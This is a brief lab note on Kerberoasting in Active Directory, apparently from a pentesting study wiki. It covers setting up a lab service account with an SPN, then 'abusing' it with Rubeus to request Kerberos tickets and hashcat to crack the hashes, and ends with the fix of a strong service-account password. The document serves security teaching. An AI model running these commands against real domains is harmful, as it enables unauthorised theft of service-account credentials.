Kerberoasting

Making the Lab

Set up general ad lab.
Add in a new user called SQLService
Open a cmd on the DC and use:
1
setspn -a <DC-NAME>/SQLService.<domain>.local:60111 <DOMAIN>\SQLService
Copied!
You can then verify that the spn can be found:
1
setspn -T <DOMAIN>.local -Q */*
Copied!

Abuse

Rubeus is simplest way:
1
rubeus.exe kerberoast /simple /nowrap
Copied!
Hashcat to crack the hash:
1
hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force
Copied!

Fixing

Could remove SPN from account but would break things.
Real fix is to use a strong password for the service account. This could be changed by:
1
net user SQLService NewPasswordThatShouldBeStrong
Copied!